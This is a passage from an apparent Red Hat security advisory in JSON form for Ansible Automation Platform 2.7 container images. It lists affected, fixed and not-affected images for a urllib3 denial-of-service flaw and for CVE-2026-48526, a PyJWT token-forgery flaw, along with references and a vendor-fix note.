"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "urllib3: urllib3: Denial of Service due to excessive HTTP response decompression"
},
{
"cve": "CVE-2026-48526",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-05-28T16:01:22.805235+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2482734"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in PyJWT, a Python library for JSON Web Token (JWT) implementation. When decoding JWTs, the library fails to validate the use of JSON Web Keys (JWK) in the HMAC algorithm while also supporting asymmetric algorithms. This allows a remote attacker to use the issuer\u0027s public key as the secret key for the HMAC algorithm, leading to the ability to forge JWTs. This vulnerability can result in authentication bypass or unauthorized access.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48526"
},
{
"category": "external",
"summary": "RHBZ#2482734",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482734"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48526",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48526"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526"
},
{
"category": "external",
"summary": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx"
}
],
"release_date": "2026-05-28T15:09:09.258000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-15T08:51:13+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64",
